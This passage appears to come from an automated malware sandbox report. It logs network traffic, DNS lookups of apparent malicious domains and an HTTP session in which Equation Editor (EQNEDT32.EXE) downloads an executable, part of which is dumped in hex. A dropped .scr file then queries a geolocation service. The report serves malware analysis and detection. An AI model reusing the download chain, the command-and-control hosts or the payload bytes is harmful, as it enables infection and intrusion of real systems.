                        Jul 1, 2024 13:58:11.884227991 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.884243965 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.884263992 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.884294033 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.884325027 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.884334087 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.884360075 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.884393930 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.884408951 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.884428978 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.884460926 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.884506941 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.884530067 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.884562969 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.884597063 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.884609938 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.884629965 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.884664059 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.884677887 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.884697914 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.884732962 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.884746075 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.884766102 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.884798050 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.884829998 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.884845018 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.884864092 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.884898901 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.884947062 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.957073927 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.957104921 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.957184076 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.957413912 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.957447052 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.957480907 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.957498074 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.957524061 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.957571030 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.957617044 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.957623959 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.957659006 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.957691908 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.957742929 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.957742929 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.957777023 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.957808971 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.957825899 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.957839012 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.957871914 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.957906008 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.957917929 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.957940102 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.957973003 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.958018064 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.958069086 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.958102942 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.958137035 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.958169937 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.958185911 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.958221912 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.958256006 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.958290100 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.958303928 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.958321095 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.958374977 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.958409071 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.958430052 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.958441973 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.958475113 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.958524942 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.958528996 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.958563089 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.958596945 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.958632946 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.958643913 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.958688974 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.958718061 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.958734035 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.958769083 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.958801985 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.958851099 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.958853960 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.958909035 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.958940983 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.958976030 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.958992004 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.959008932 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.959063053 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.959093094 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.959109068 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.959126949 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.959160089 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.959172010 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.959211111 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.959244967 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.959278107 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.959291935 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.959312916 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.959362030 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.959398985 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.959404945 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.959433079 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.959466934 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.959511042 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.959515095 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.959567070 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.959600925 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.959635019 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.959646940 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.959667921 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.959702969 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.959714890 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.959736109 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.959769964 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.959784985 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.959803104 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.959836006 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.959867954 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.959880114 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.959908009 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.959953070 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.972953081 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.972984076 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.973054886 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:12.012021065 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:18.712434053 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:18.717325926 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:18.717385054 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:18.717448950 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:18.717513084 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:18.722194910 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:18.722258091 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:18.722294092 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:18.722342014 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:18.722351074 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:18.722354889 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:18.722388983 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:18.722421885 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:18.727118969 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:18.727133036 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:18.727147102 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:18.727170944 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:18.727180004 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:18.727200985 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:18.727320910 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:18.727333069 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:18.727488041 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:18.727678061 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:18.732120991 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:18.732199907 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:18.732213020 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:18.732686996 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:18.732741117 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:19.838587999 CEST19804916580.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:19.842154026 CEST491651980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:19.847126007 CEST19804916580.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:49.880806923 CEST19804916580.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:49.882699966 CEST491651980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:49.887656927 CEST19804916580.85.154.121192.168.2.22
                        Jul 1, 2024 13:59:15.302453995 CEST4916780192.168.2.22178.237.33.50
                        Jul 1, 2024 13:59:15.661045074 CEST4916780192.168.2.22178.237.33.50
                        Jul 1, 2024 13:59:16.363032103 CEST4916780192.168.2.22178.237.33.50
                        Jul 1, 2024 13:59:17.565829039 CEST4916780192.168.2.22178.237.33.50
                        Jul 1, 2024 13:59:19.910940886 CEST19804916580.85.154.121192.168.2.22
                        Jul 1, 2024 13:59:19.914839029 CEST491651980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:59:19.919925928 CEST19804916580.85.154.121192.168.2.22
                        Jul 1, 2024 13:59:19.969722986 CEST4916780192.168.2.22178.237.33.50
                        Jul 1, 2024 13:59:24.769114971 CEST4916780192.168.2.22178.237.33.50
                        Jul 1, 2024 13:59:34.437833071 CEST4916780192.168.2.22178.237.33.50
                        Jul 1, 2024 13:59:49.929110050 CEST19804916580.85.154.121192.168.2.22
                        Jul 1, 2024 13:59:49.930588007 CEST491651980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:59:49.935481071 CEST19804916580.85.154.121192.168.2.22
                        Jul 1, 2024 14:00:19.968604088 CEST19804916580.85.154.121192.168.2.22
                        Jul 1, 2024 14:00:19.970000029 CEST491651980192.168.2.2280.85.154.121
                        Jul 1, 2024 14:00:19.974853039 CEST19804916580.85.154.121192.168.2.22
                        Jul 1, 2024 14:00:50.011327982 CEST19804916580.85.154.121192.168.2.22
                        Jul 1, 2024 14:00:50.012664080 CEST491651980192.168.2.2280.85.154.121
                        Jul 1, 2024 14:00:50.018548012 CEST19804916580.85.154.121192.168.2.22
                        Jul 1, 2024 14:01:20.065530062 CEST19804916580.85.154.121192.168.2.22
                        Jul 1, 2024 14:01:20.067357063 CEST491651980192.168.2.2280.85.154.121
                        Jul 1, 2024 14:01:20.072237015 CEST19804916580.85.154.121192.168.2.22
                        Jul 1, 2024 14:01:50.121922970 CEST19804916580.85.154.121192.168.2.22
                        Jul 1, 2024 14:01:50.123835087 CEST491651980192.168.2.2280.85.154.121
                        Jul 1, 2024 14:01:50.129270077 CEST19804916580.85.154.121192.168.2.22
                        Jul 1, 2024 14:02:20.158067942 CEST19804916580.85.154.121192.168.2.22
                        Jul 1, 2024 14:02:20.162425041 CEST491651980192.168.2.2280.85.154.121
                        Jul 1, 2024 14:02:20.167278051 CEST19804916580.85.154.121192.168.2.22

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Jul 1, 2024 13:58:01.120873928 CEST5291753192.168.2.228.8.8.8
                        Jul 1, 2024 13:58:01.131447077 CEST53529178.8.8.8192.168.2.22
                        Jul 1, 2024 13:58:07.391405106 CEST6275153192.168.2.228.8.8.8
                        Jul 1, 2024 13:58:07.427586079 CEST53627518.8.8.8192.168.2.22
                        Jul 1, 2024 13:58:09.544725895 CEST5789353192.168.2.228.8.8.8
                        Jul 1, 2024 13:58:09.553723097 CEST53578938.8.8.8192.168.2.22

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Jul 1, 2024 13:58:01.120873928 CEST192.168.2.228.8.8.80x5aeaStandard query (0)sinopecllc.topA (IP address)IN (0x0001)false
                        Jul 1, 2024 13:58:07.391405106 CEST192.168.2.228.8.8.80x8787Standard query (0)antfly50.sytes.netA (IP address)IN (0x0001)false
                        Jul 1, 2024 13:58:09.544725895 CEST192.168.2.228.8.8.80xeeb5Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Jul 1, 2024 13:58:01.131447077 CEST8.8.8.8192.168.2.220x5aeaNo error (0)sinopecllc.top31.192.235.145A (IP address)IN (0x0001)false
                        Jul 1, 2024 13:58:07.427586079 CEST8.8.8.8192.168.2.220x8787No error (0)antfly50.sytes.net80.85.154.121A (IP address)IN (0x0001)false
                        Jul 1, 2024 13:58:09.553723097 CEST8.8.8.8192.168.2.220xeeb5No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                        HTTP Request Dependency Graph

                        • sinopecllc.top
                        • geoplugin.net

                        HTTP Packets

                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.224916431.192.235.145803240C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                        TimestampBytes transferredDirectionData
                        Jul 1, 2024 13:58:01.156550884 CEST309OUTGET /plug.scr HTTP/1.1
                        Accept: */*
                        Accept-Encoding: gzip, deflate
                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                        Host: sinopecllc.top
                        Connection: Keep-Alive
                        Jul 1, 2024 13:58:01.770646095 CEST1236INHTTP/1.1 200 OK
                        Server: nginx
                        Date: Mon, 01 Jul 2024 11:58:01 GMT
                        Content-Type: application/x-silverlight
                        Content-Length: 1140744
                        Connection: keep-alive
                        Last-Modified: Mon, 01 Jul 2024 02:59:13 GMT
                        ETag: "116808-61c26c839c3ba"
                        Accept-Ranges: bytes
                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 17 1b 82 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 14 11 00 00 1c 00 00 00 00 00 00 9e 33 11 00 00 20 00 00 00 40 11 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 11 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 33 11 00 4f 00 00 00 00 40 11 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 32 11 00 08 36 00 00 00 60 11 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELf03 @@ @L3O@26` H.text `.rsrc@@@.reloc`0@B3H\2|Q^}((*0+,{+,{o(*0(ss}({o{( o!{o"{o#o${o#( o%{o&{rpo'to({ B6s)o*{rpo+{ > ?s,o-{o.{o/"@"PAs0(1(2r1po'
                        Jul 1, 2024 13:58:01.770714998 CEST1236INData Raw: 00 0a 74 1f 00 00 01 6f 33 00 00 0a 00 02 19 6f 22 00 00 0a 00 02 20 a0 03 00 00 20 08 02 00 00 73 2c 00 00 0a 28 34 00 00 0a 00 02 16 28 35 00 00 0a 00 02 28 36 00 00 0a 02 7b 02 00 00 04 6f 37 00 00 0a 00 02 17 6f 38 00 00 0a 00 02 16 28 39 00
                        Data Ascii: to3o" s,(4(5(6{o7o8(9r]p(+rupo:(;(<*^}(=(*0+,{+,{o(>*0G("@"PAs0
                        Jul 1, 2024 13:58:01.770757914 CEST1236INData Raw: 28 4a 00 00 0a 13 04 11 04 6f 4b 00 00 0a 16 9a 13 05 d0 4f 00 00 01 28 1b 00 00 0a 02 7b 07 00 00 04 6f 4c 00 00 0a 16 1f 0e 6f 4d 00 00 0a 20 00 01 00 00 14 14 18 8d 16 00 00 01 25 16 11 05 a2 25 17 02 7e 04 00 00 04 72 35 01 00 70 28 12 00 00
                        Data Ascii: (JoKO({oLoM %%~r5p((N&{( o!{o"{o#o${o#( oE{o#( o%{o&{rKpo'to({ } s)
                        Jul 1, 2024 13:58:01.770792961 CEST1236INData Raw: 1e 6f 2e 00 00 0a 00 02 7b 0c 00 00 04 72 1f 02 00 70 6f 3a 00 00 0a 00 02 7b 0c 00 00 04 02 fe 06 0f 00 00 06 73 48 00 00 0a 6f 49 00 00 0a 00 02 7b 0d 00 00 04 28 20 00 00 0a 6f 21 00 00 0a 00 02 7b 0d 00 00 04 6f 23 00 00 0a 16 6f 24 00 00 0a
                        Data Ascii: o.{rpo:{sHoI{( o!{o#o${o#( o%{o&{r3po'to({ s)o*{sFoG{rOpo+{ 5 s,o-{
                        Jul 1, 2024 13:58:01.770828009 CEST1236INData Raw: 00 00 0a 00 02 7b 39 00 00 04 16 6f 5f 00 00 0a 00 02 16 7d 13 00 00 04 02 7b 3a 00 00 04 16 6f 62 00 00 0a 00 02 7b 22 00 00 04 6f 63 00 00 0a 00 2a ea 00 02 28 1c 00 00 06 00 02 7b 2c 00 00 04 02 7b 18 00 00 04 6f 2a 00 00 0a 00 02 7b 2c 00 00
                        Data Ascii: {9o_}{:ob{"oc*({,{o*{,o`oa{,o_*({4{o*{4o`oa{4o_*"(d*>{9o_*&(*0Q~,C{>oE(e
                        Jul 1, 2024 13:58:01.770863056 CEST1236INData Raw: 04 28 6f 00 00 0a 15 fe 01 16 fe 01 0a 06 2c 15 00 12 01 04 6f 69 00 00 0a 04 6f 6b 00 00 0a 28 29 00 00 0a 00 02 7c 15 00 00 04 15 28 6a 00 00 0a 00 02 7c 15 00 00 04 15 28 6c 00 00 0a 00 02 7c 14 00 00 04 15 28 6a 00 00 0a 00 02 7c 14 00 00 04
                        Data Ascii: (o,oiok()|(j|(l|(j|(l{:ob*0W{9H(wsxoyoz{o{P(w(|s}oz|(~{onooz|(~
                        Jul 1, 2024 13:58:01.770899057 CEST1236INData Raw: 00 0a 13 07 11 07 2c 0d 00 73 8b 00 00 0a 0a 00 38 a5 00 00 00 07 6f 4c 00 00 0a 72 35 03 00 70 28 91 00 00 0a 13 08 11 08 2c 33 00 23 00 00 00 00 00 00 24 40 23 00 00 00 00 00 00 26 40 73 8c 00 00 0a 23 00 00 00 60 66 66 e6 3f 23 00 00 00 40 33
                        Data Ascii: ,s8oLr5p(,3#$@#&@s#`ff?#@33?s+\oLrIp(,'s s ss+oLrYp(,s~o{"o3*0w|(~|
                        Jul 1, 2024 13:58:01.770930052 CEST108INData Raw: 22 00 00 04 6f 1e 00 00 0a 00 02 7b 23 00 00 04 6f 1e 00 00 0a 00 02 7b 2b 00 00 04 6f 1e 00 00 0a 00 02 7b 2c 00 00 04 6f 1e 00 00 0a 00 02 7b 34 00 00 04 6f 1e 00 00 0a 00 02 7b 39 00 00 04 6f 1e 00 00 0a 00 02 28 1e 00 00 0a 00 02 7b 1a 00 00
                        Data Ascii: "o{#o{+o{,o{4o{9o({o{( o!
                        Jul 1, 2024 13:58:01.770962954 CEST1236INData Raw: 7b 1a 00 00 04 19 6f 22 00 00 0a 00 02 7b 1a 00 00 04 6f 23 00 00 0a 16 6f 24 00 00 0a 00 02 7b 1a 00 00 04 6f 23 00 00 0a 28 20 00 00 0a 6f 25 00 00 0a 00 02 7b 1a 00 00 04 16 6f 26 00 00 0a 00 02 7b 1a 00 00 04 06 72 01 00 00 70 6f 27 00 00 0a
                        Data Ascii: {o"{o#o${o#( o%{o&{rpo'to({.s)o*{rpo+{94s,o-{o.{o/{ sHoI{o{( o!{o"
                        Jul 1, 2024 13:58:01.770999908 CEST1236INData Raw: 7b 1f 00 00 04 6f 23 00 00 0a 16 6f 24 00 00 0a 00 02 7b 1f 00 00 04 6f 23 00 00 0a 28 20 00 00 0a 6f 45 00 00 0a 00 02 7b 1f 00 00 04 6f 23 00 00 0a 28 20 00 00 0a 6f 25 00 00 0a 00 02 7b 1f 00 00 04 16 6f 26 00 00 0a 00 02 7b 1f 00 00 04 06 72
                        Data Ascii: {o#o${o#( oE{o#( o%{o&{rpo'to({ 9s)o*{rpo+{R_s,o-{o.{o/{sHoI{o{( o!
                        Jul 1, 2024 13:58:01.775934935 CEST1236INData Raw: 00 00 04 1f 09 6f 2e 00 00 0a 00 02 7b 23 00 00 04 16 6f 5f 00 00 0a 00 02 7b 27 00 00 04 16 6f 1f 00 00 0a 00 02 7b 27 00 00 04 28 20 00 00 0a 6f 21 00 00 0a 00 02 7b 27 00 00 04 19 6f 22 00 00 0a 00 02 7b 27 00 00 04 28 9b 00 00 0a 6f 9c 00 00
                        Data Ascii: o.{#o_{'o{'( o!{'o"{'(o{'o#o${'o#( oE{'o#( o%{'o&{'rpo'to({' gs)o*{'rpo+{'Rrs,o


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        1192.168.2.2249167178.237.33.50803704C:\Users\user\AppData\Roaming\plugman23456.scr
                        TimestampBytes transferredDirectionData
                        Jul 1, 2024 13:58:09.588259935 CEST71OUTGET /json.gp HTTP/1.1
                        Host: geoplugin.net
                        Cache-Control: no-cache
                        Jul 1, 2024 13:58:10.268413067 CEST1170INHTTP/1.1 200 OK
                        date: Mon, 01 Jul 2024 11:58:10 GMT
                        server: Apache
                        content-length: 962
                        content-type: application/json; charset=utf-8
                        cache-control: public, max-age=300
                        access-control-allow-origin: *
                        Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 30 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                        Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"0ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Target ID:0
                        Start time:07:57:56
                        Start date:01/07/2024
